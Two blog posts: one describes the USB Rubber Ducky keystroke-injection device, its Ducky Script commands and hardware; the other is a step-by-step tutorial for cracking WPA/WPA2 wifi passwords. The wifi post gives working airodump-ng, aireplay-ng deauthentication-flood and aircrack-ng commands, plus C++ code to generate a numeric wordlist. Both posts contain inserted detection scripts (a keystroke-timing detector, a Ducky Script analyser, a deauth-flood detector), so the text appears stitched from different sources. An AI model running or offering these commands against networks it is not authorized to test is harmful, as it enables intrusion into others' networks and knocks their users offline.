Tuesday, April 28, 2020

USB RUBBER DUCKY #TOOLS


USB Rubber Ducky :


The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. Computers recognize it as a regular keyboard and automatically accept its pre-programmed keystroke payloads at over 1000 words per minute.




ABOUT :


It was developed by the Hak5 community after the success of the USB Switchblade, an attack platform that was highly effective against local Windows targets. The USB Rubber Ducky is cross-platform (Windows, Mac, Linux) and achieves its results by posing as a ubiquitous keyboard.
The USB Rubber Ducky isn't an ordinary HID (Human Interface Device). Coupled with a 60 MHz 32-bit processor and a simple scripting language, anyone can craft payloads capable of changing system settings, opening backdoors, retrieving data, initiating reverse shells, or basically anything that can be achieved with physical access, all of it automated and executed in a matter of seconds.
The first USB Rubber Ducky was invented by Hak5 founder Darren Kitchen while working in systems administration. Tired of typing the same commands to fix printers and network shares again and again, he programmed a development board to emulate the typing for him; the device evolved out of laziness, and thus the keystroke injection attack was born. Since 2010 the USB Rubber Ducky has been a favourite among hackers, pentesters and IT pros. With its debut, keystroke injection attacks were invented, and since then it has captured the imagination with its simple scripting language, formidable hardware, and covert design.


Key features :

  • Cross-Platform: Attacks any OS that supports USB Keyboards
  • Simple Scripting language: Start writing payloads in minutes
  • Open Source Firmware: Add functionality using included libraries
  • Expandable Storage: Micro SD cards make it possible to carry multiple payloads
  • Community Support: Share sample scripts, complete payloads and get help online





Working of a USB Rubber Ducky :


When a USB device is connected to a system, the system queries the device to determine its type and purpose. The device type allows the system to load the appropriate driver so the USB device can be used. For example, when a Wi-Fi adapter is inserted, the system queries the device and finds it is a specific model of Realtek Wi-Fi adapter. The system then loads the appropriate driver for the device and starts it, if possible. Once started, the system will attempt to use the Wi-Fi adapter to connect to a network. If needed, a configuration window may appear to help configure the device properly.

Most USB devices, such as keyboards, are automatically detected and used by the system. A keyboard is seen by the system as a source of input that the system will accept. The USB Rubber Ducky presents itself as a keyboard device, so because of that device type most systems will start accepting data from it automatically.

Scripts can be created and placed in the USB Rubber Ducky's memory so that their keystrokes are pushed into the system. These scripts can be used to gain a lot of information from the system into which the USB Rubber Ducky is inserted.

Because of the widespread use and acceptance of USB devices, the Rubber Ducky works on all devices that support the USB keyboard interface.
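The same auto-accept behaviour is what makes injected typing detectable on the host: a human rarely sustains more than a handful of keystrokes per second and never with perfectly even timing, while the Ducky types at a constant, jitter-free rate (the post quotes around 16 keystrokes a second). The following Python script is an added example, not part of the original post or of Hak5's software. It applies that timing heuristic to a constructed stream of keystroke timestamps; the 10 keys/s threshold, the 12-key window and the sample data are assumptions chosen for illustration.

```python
"""Keystroke-timing heuristic for spotting automated (injected) typing.

Added example, not part of the original post or Hak5's software. It takes a
list of keystroke timestamps (seconds) and flags windows whose average
inter-key gap is faster than a human could plausibly sustain.
"""
from statistics import mean, pstdev

# Assumptions: humans rarely sustain more than ~10 keystrokes/s; the post says
# the Rubber Ducky sends around 16 a second (a 62.5 ms gap) with no jitter.
MIN_HUMAN_INTERVAL_S = 0.10   # 10 keys/s
WINDOW = 12                   # keystrokes per examined window


def timestamps_from_gaps(gaps, start=0.0):
    """Turn a list of inter-key gaps (seconds) into absolute timestamps."""
    stamps = [start]
    for gap in gaps:
        stamps.append(stamps[-1] + gap)
    return stamps


def injection_windows(timestamps, window=WINDOW, min_interval=MIN_HUMAN_INTERVAL_S):
    """Return (start_index, keys_per_second, jitter_s) for every window of
    `window` consecutive keystrokes whose mean gap is below min_interval."""
    hits = []
    for start in range(0, len(timestamps) - window + 1):
        chunk = timestamps[start:start + window]
        gaps = [b - a for a, b in zip(chunk, chunk[1:])]
        avg = mean(gaps)
        if avg < min_interval:
            # jitter (population std-dev of the gaps) is ~0 for machine typing
            hits.append((start, round(1 / avg, 1), round(pstdev(gaps), 4)))
    return hits


def classify(timestamps):
    """Summarise a keystroke stream as 'normal' or 'keystroke injection suspected'."""
    return "keystroke injection suspected" if injection_windows(timestamps) else "normal"


# Constructed sample: 15 keystrokes of human typing (irregular 140-350 ms gaps)
# followed by 30 keystrokes injected at exactly 16 keys/s.
HUMAN_GAPS = [0.18, 0.25, 0.14, 0.31, 0.22, 0.19, 0.27, 0.16, 0.35, 0.21, 0.24, 0.17, 0.29, 0.20]
INJECTED_GAPS = [1 / 16] * 30
HUMAN_ONLY = timestamps_from_gaps(HUMAN_GAPS)
MIXED = timestamps_from_gaps(HUMAN_GAPS + INJECTED_GAPS)

if __name__ == "__main__":
    print("human only :", classify(HUMAN_ONLY))
    print("with burst :", classify(MIXED))
    for start, rate, jitter in injection_windows(MIXED)[:3]:
        print(f"  window at key {start}: {rate} keys/s, jitter {jitter} s")
```

On a real host the timestamps would come from the operating system's input layer rather than a list; the alert is usually paired with a lock of keyboard input or a prompt, since the whole point of the device is that it finishes before a person can react.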

Ducky Script :


Ducky Script is the language of the USB Rubber Ducky. Scripts can be written in any common ASCII text editor such as Notepad, vi, Emacs, nano, gedit, kedit, TextEdit, etc. The Ducky Script language is very straightforward: it is based on keystrokes, so a script reads like a description of what a keyboard would type.

Syntax :


Ducky Script syntax is simple. Each command resides on its own line and may be followed by options. Commands are written in ALL CAPS, because ducks are loud and like to quack with pride. Most commands invoke keystrokes, key-combos or strings of text, while some offer delays or pauses.


The commands are as follows:
  • DEFAULT_DELAY ### - sets a default delay in milliseconds between each command in the whole script. Delays are necessary to allow windows to open, characters to be sent to the system, etc.
  • DELAY ### - pauses for the given number of milliseconds at the point where the command is given. The Rubber Ducky can send around 16 keystrokes a second to the system.
  • GUI x – the same as pressing the Windows key together with key x, to perform a certain task in Windows or another Operating System (OS). For example, the Windows key and 'r' opens the Run window. You can also use the command WINDOW.
  • STRING xxxx – sends the string of characters to the system.
  • MENU or APP – performs the same action as a right-click.
  • REPLAY x – causes the last command to be repeated x times.
  • Key presses to the system (these are the same as pressing the designated key)
    • BREAK
    • PAUSE
    • CTRL
    • ALT
    • CAPSLOCK
    • DELETE
    • END
    • ESC (ESCAPE)
    • HOME
    • INSERT
    • NUMLOCK
    • PAGEUP
    • PAGEDOWN
    • PRINTSCREEN
    • SCROLLLOCK
    • SPACE
    • TAB
    • F1..F12
    • UP (UPARROW)
    • DOWN (DOWNARROW)
    • LEFT (LEFTARROW)
    • RIGHT (RIGHTARROW)

The USB Rubber Ducky sends data to the system as hex-encoded keystrokes, just as a keyboard would. To convert the text script file to that hex form you use 'duckencoder'.
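As an added example (not code from the original post or from Hak5), here is a small Ducky Script parser in Python that turns a script into its sequence of delays, strings and key presses, then estimates how long the payload would take to type and lists every string it would type. The per-keystroke time uses the 16 keystrokes a second quoted above (62.5 ms each) and DEFAULT_DELAY is applied after every command; both are modelling assumptions. It accepts REPLAY as spelled in this post and REPEAT as spelled in Hak5's documentation, and skips REM comment lines. The sample script is constructed and only opens Notepad and types a greeting.

```python
"""Minimal Ducky Script parser and payload analyser.

Added example, not code from the original post or from Hak5. It understands the
commands listed above (DEFAULT_DELAY, DELAY, STRING, GUI/WINDOW, MENU/APP,
REPLAY and bare key presses or key combos) plus REM comments and the REPEAT
spelling used in Hak5's documentation. Timing is an estimate.
"""
from dataclasses import dataclass, field

KEY_MS = 1000 / 16   # the post says ~16 keystrokes a second, i.e. 62.5 ms each (assumed)


@dataclass
class Command:
    kind: str      # "delay" (ms), "string" (text) or "keys" (tuple of key names)
    value: object


@dataclass
class Summary:
    total_ms: float
    keystrokes: int
    typed_strings: list = field(default_factory=list)


def parse(script):
    """Return a list of (Command, default_delay_ms) pairs, with REPLAY expanded.

    default_delay_ms is the DEFAULT_DELAY in force when the command was parsed;
    it is modelled as a pause after every command."""
    default_delay = 0
    commands = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue                      # blank line or comment
        op, _, arg = line.partition(" ")
        arg = arg.strip()
        if op in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)
        elif op in ("REPLAY", "REPEAT"):  # repeat the previous command arg times
            if not commands:
                raise ValueError(f"{op} with no previous command")
            commands.extend([commands[-1]] * int(arg))
        elif op == "DELAY":
            commands.append((Command("delay", int(arg)), default_delay))
        elif op == "STRING":
            commands.append((Command("string", arg), default_delay))
        elif op in ("MENU", "APP"):
            commands.append((Command("keys", ("MENU",)), default_delay))
        elif op in ("GUI", "WINDOW", "WINDOWS"):
            commands.append((Command("keys", ("GUI",) + tuple(arg.split())), default_delay))
        else:                              # a key or key combo, e.g. ENTER or CTRL ALT DELETE
            commands.append((Command("keys", (op,) + tuple(arg.split())), default_delay))
    return commands


def analyze(commands):
    """Estimate run time, count keystrokes and collect every string the script types."""
    total_ms, keystrokes, typed = 0.0, 0, []
    for cmd, default_delay in commands:
        if cmd.kind == "delay":
            total_ms += cmd.value
        elif cmd.kind == "string":
            total_ms += KEY_MS * len(cmd.value)
            keystrokes += len(cmd.value)
            typed.append(cmd.value)
        else:                              # one press of a key or combo
            total_ms += KEY_MS
            keystrokes += 1
        total_ms += default_delay
    return Summary(total_ms, keystrokes, typed)


# Constructed, harmless sample: open the Run box, start Notepad, type a greeting.
SAMPLE_SCRIPT = """\
REM constructed example script
DEFAULT_DELAY 100
DELAY 500
GUI r
STRING notepad
ENTER
DELAY 1000
STRING Hello from the duck
REPLAY 2
"""

if __name__ == "__main__":
    summary = analyze(parse(SAMPLE_SCRIPT))
    print(f"estimated run time: {summary.total_ms:.0f} ms, {summary.keystrokes} keystrokes")
    for text in summary.typed_strings:
        print("types:", repr(text))
```

Reading a script this way, in its text form, is how an auditor reviews what a payload found in the field would actually do: every typed string is exposed, and the timing estimate (about six and a half seconds for the sample) shows how short a window of physical access the device needs.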



Compiling a Ducky script :


Ducky Scripts are compiled into hex files that are named inject.bin and placed in the root of a micro SD card for execution by the USB Rubber Ducky. This is done with the tool duckencoder, a cross-platform command-line Java program which converts the Ducky Script syntax into hex files. As of duckencoder 1.X the usage is:

Usage: duckencode -i [file ..]                    Encode specified file
Or:    duckencode -i [file ..] -o [file ..]       Encode to specified file

For example, on a Linux system:

java -jar duckencoder.jar -i exploit.txt -o /media/microsdcard/inject.bin

Payloads :


In the context of a cyber-attack, a payload is the component of the attack which causes harm to the victim. Malicious payloads can sit dormant on a computer or network for seconds or even months until triggered.

Some payloads which are developed by hak5 are:

Hardware Overview :


  • Atmel 32bit AVR Microcontroller AT32UC3B1256
  • MicroSD card reader
  • Micro push-button
  • Multi-color LED indicator
  • JTAG Interface (can be used for I/O)
  • Standard “Type A” USB connector

Atmel AT32UC3B1256 Features :


  • High Performance, Low Power AVR 32 UC 32-Bit Microcontroller
  • Compact Single-cycle RISC Instruction Set Including DSP Instruction Set
  • Read-Modify-Write Instructions and Atomic Bit Manipulation
  • Performing up to 1.39 DMIPS / MHz
  • Up to 83 DMIPS Running at 60 MHz from Flash
  • Up to 46 DMIPS Running at 30 MHz from Flash
  • Memory Protection Unit
  • Multi-hierarchy Bus System
  • High-Performance Data Transfers on Separate Buses for Increased Performance
  • 7 Peripheral DMA Channels Improves Speed for Peripheral Communication
  • Internal High-Speed Flash
  • 512K Bytes, 256K Bytes, 128K Bytes, 64K Bytes Versions
  • Single Cycle Access up to 30 MHz
  • Prefetch Buffer Optimizing Instruction Execution at Maximum Speed
  • 4ms Page Programming Time and 8ms Full-Chip Erase Time
  • 100,000 Write Cycles, 15-year Data Retention Capability
  • Flash Security Locks and User Defined Configuration Area
  • Internal High-Speed SRAM, Single-Cycle Access at Full Speed
  • 96K Bytes (512KB Flash), 32K Bytes (256KB and 128KB Flash), 16K Bytes (64KB Flash)
  • Interrupt Controller
  • Autovectored Low Latency Interrupt Service with Programmable Priority
  • System Functions
  • Power and Clock Manager Including Internal RC Clock and One 32KHz Oscillator
  • Two Multipurpose Oscillators and Two Phase-Lock-Loop (PLL) allowing Independent CPU Frequency from USB Frequency
  • Watchdog Timer, Real-Time Clock Timer
  • Universal Serial Bus (USB)
  • Device 2.0 and Embedded Host Low Speed and Full Speed
  • Flexible End-Point Configuration and Management with Dedicated DMA Channels
  • On-chip Transceivers Including Pull-Ups
  • USB Wake Up from Sleep Functionality
  • One Three-Channel 16-bit Timer/Counter (TC)
  • Three External Clock Inputs, PWM, Capture and Various Counting Capabilities
  • One 7-Channel 20-bit Pulse Width Modulation Controller (PWM)
  • Three Universal Synchronous/Asynchronous Receiver/Transmitters (USART)
  • Independent Baudrate Generator, Support for SPI, IrDA and ISO7816 interfaces
  • Support for Hardware Handshaking, RS485 Interfaces and Modem Line
  • One Master/Slave Serial Peripheral Interfaces (SPI) with Chip Select Signals
  • One Synchronous Serial Protocol Controller
  • Supports I2S and Generic Frame-Based Protocols
  • One Master/Slave Two-Wire Interface (TWI), 400kbit/s I2C-compatible
  • One 8-channel 10-bit Analog-To-Digital Converter, 384ks/s
  • 16-bit Stereo Audio Bitstream DAC
  • Sample Rate Up to 50 KHz
  • QTouch Library Support
  • Capacitive Touch Buttons, Sliders, and Wheels
  • QTouch and QMatrix Acquisition

USB Rubber Ducky purchase :


The USB Rubber Ducky can be purchased at https://hakshop.com/products/usb-rubber-ducky-deluxe

The cost of USB Rubber Ducky was around $50 USD.











References:


The information in this article is taken from GitHub, from the hak5darren profile. You can visit the original article on GitHub from this link.

Monday, February 17, 2020

Hacking a WPA/WPA-2 PSK wi-fi network. #Ethical hacking Tutorials

Before discussing this topic I want to make sure that I am not promoting any sort of illegal hacking. This article or tutorial is written and published only in the interest of bringing awareness to people of how easy it is to hack into a WPA/WPA-2 wi-fi network.
Warning: Hacking into others' wi-fi networks and stealing their data is a serious offence. There will be serious actions taken if you get caught. I never promote illegal hacking.
While discussing WPA/WPA-2 PSK wi-fi networks: WPA stands for wireless protected access, WPA-2 stands for wireless protected access-2 and PSK stands for pre-shared key.

The password length of a WPA/WPA-2 PSK wi-fi network is between 8 and 63 characters.
Before hacking into a WPA/WPA-2 PSK wi-fi network we need to know how this kind of network actually works. When a user tries to connect to this type of network, he/she needs to enter the correct password assigned to the specific network SSID he/she wants to connect to. The password entered on the user's device is sent to the wi-fi router; this transfer is carried out over the air with the 802.11b protocol. The data containing the password is sent to the router in the form of packets. When the router receives it, the password sent by the user who is trying to connect is compared against the original password assigned to that network SSID. If the password matches, the user can connect to the network; if it doesn't match, the connection is terminated. So we know that the client/device trying to connect to the wi-fi network sends the password in encrypted packets of data. Here we are going to intercept the connection and capture the encrypted password so that we can decrypt it using a word list.

A word list consists of all possible combinations of strings (alphabetical, alphanumerical, numerical, etc.) of length 8 to 63 characters.

In this tutorial I am using the Airmon-ng tool in the Kali Linux operating system to explain how anyone can hack a WPA/WPA-2 wi-fi network.

STEP 1

Open terminal in Kali Linux and enter the following command.

   root@kali:~ #  airmon-ng check kill                                                                    

This command kills the ongoing Wi-Fi processes.

STEP 2

Now we have to scan all the available wi-fi networks until we find our targeted wi-fi network.

   root@kali:~ #  airodump-ng <network interface name>                                   
With the above command we can scan for and find the targeted wi-fi network within range. After finding the target network, press Ctrl+C to terminate scanning.
The network interface name is the name of the wireless card; if there is one wireless card attached to the computer, the name of the card is wlan0.


STEP 3
Once you find the target network, all we need to do is attack it.
   root@kali:~ #  airodump-ng -c <channel> -w <file name to save> --bssid <BSSID> <network interface name>

The above command captures the handshake and saves it in .cap format. That is, the encrypted password sent from the user to the router is captured and saved in a file for the later decryption of the password.



STEP 4

Open a new terminal window and enter the following command.

   root@kali:~ #  aireplay-ng -0 0 -a <bssid> <network interface name>
The above command performs a wi-fi de-authentication attack in order to intercept the encrypted password from the connected clients (-0 selects de-authentication mode, and a count of 0 keeps sending the frames until stopped). It disconnects all connected devices/clients from the targeted network, so they tend to reconnect to the network.

Once a client reconnects we see WPA handshake: <bssid> in the previous terminal where we are capturing the handshake file.

Press Ctrl+C to deactivate the de-authentication attack.
We have successfully captured the encrypted password, but we still need to decrypt it.
STEP 5

See below for how to obtain a word list.
   root@kali:~ #  aircrack-ng -w <directory of word list> <file generated during handshake with extension .cap>


This command checks every string in the word list against the handshake file and, if one matches, shows the password.
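The de-authentication step above is exactly what a wireless intrusion detection system watches for: deauthentication and disassociation are unauthenticated management frames, and a burst of them from one BSSID addressed to the broadcast address is the signature of this attack. The Python below is an added example, not part of the original tutorial or of the aircrack-ng suite. It runs a per-BSSID, per-second counter over a constructed list of frame records (time, 802.11 management subtype, BSSID, destination); the threshold of 10 frames per second and the sample addresses are assumptions.

```python
"""Deauthentication-flood detector over 802.11 management-frame records.

Added example, not part of the original tutorial or of the aircrack-ng suite.
Each record is (time_s, subtype, bssid, destination); subtype 12 is
deauthentication and 10 is disassociation. The threshold and all addresses
below are assumptions / constructed values.
"""
from collections import defaultdict

DEAUTH, DISASSOC, BEACON = 12, 10, 8      # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"
THRESHOLD = 10                            # deauth/disassoc frames per BSSID per second (assumed)


def deauth_flood_alerts(frames, threshold=THRESHOLD):
    """Count deauth/disassoc frames per (BSSID, one-second bucket) and return
    an alert dict for every bucket at or above the threshold."""
    stats = defaultdict(lambda: [0, 0])   # (bssid, second) -> [total, broadcast-addressed]
    for t, subtype, bssid, dest in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        entry = stats[(bssid, int(t))]
        entry[0] += 1
        if dest == BROADCAST:             # one frame kicking every client at once
            entry[1] += 1
    alerts = []
    for (bssid, second), (total, broadcast) in sorted(stats.items(), key=lambda kv: kv[0][1]):
        if total >= threshold:
            alerts.append({"bssid": bssid, "second": second,
                           "count": total, "broadcast": broadcast})
    return alerts


AP = "02:00:00:00:aa:01"                  # constructed, locally administered BSSID
CLIENT = "02:00:00:00:bb:10"              # constructed client address


def constructed_capture():
    """Ten seconds of beacons, one legitimate unicast deauth at t=5.3 s, then a
    64-frame broadcast deauth burst packed into half a second from t=7.0 s."""
    frames = [(i * 0.1, BEACON, AP, BROADCAST) for i in range(100)]
    frames.append((5.3, DEAUTH, AP, CLIENT))
    frames += [(7.0 + i * (0.5 / 64), DEAUTH, AP, BROADCAST) for i in range(64)]
    return frames


if __name__ == "__main__":
    for alert in deauth_flood_alerts(constructed_capture()):
        print(f"ALERT {alert['bssid']} t={alert['second']}s: "
              f"{alert['count']} deauth/disassoc frames ({alert['broadcast']} broadcast)")
```

In a live deployment the records would come from a monitor-mode capture; a single unicast deauth (an access point dropping an idle client) stays below the threshold, while the flood trips it. The durable mitigation is 802.11w Protected Management Frames, mandatory in WPA3, which authenticates these frames so that forged ones are discarded by the client and the handshake is never forced.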





This is how we can hack a WPA/WPA-2 wi-fi network using the Airmon-ng tool in the Kali Linux operating system.

I prepared a word list but I cannot upload the files, so I wrote code to generate the word list; you can run the code on your PC to obtain the word list, or you can download a word list from the internet or any other website.

Code to generate an 8-digit word list:

#include <fstream>
using namespace std;

// Writes every 8-digit numeric string from 00000000 to 99999999 to craker.txt,
// one per line. Each nested loop supplies one digit, so the file holds 10^8 lines.
int main() {
    ofstream out;
    out.open("craker.txt");
    const unsigned int count = 10;   // ten possible digits per position
    for (unsigned int i = 0; i < count; i += 1)
    for (unsigned int j = 0; j < count; j += 1)
    for (unsigned int k = 0; k < count; k += 1)
    for (unsigned int m = 0; m < count; m += 1)
    for (unsigned int n = 0; n < count; n += 1)
    for (unsigned int v = 0; v < count; v += 1)
    for (unsigned int t = 0; t < count; t += 1)
    for (unsigned int r = 0; r < count; r += 1)
        // '\n' rather than endl: endl flushes on every line, which is very slow for 10^8 lines
        out << i << j << k << m << n << v << t << r << '\n';
    out.close();
    return 0;
}


If you have any doubts regarding this tutorial, drop them in the comments section below and I will get to them.
If you face any difficulty while going through this tutorial, I made a video tutorial that you can watch from the link below:
https://youtu.be/00EhvJM0sjo
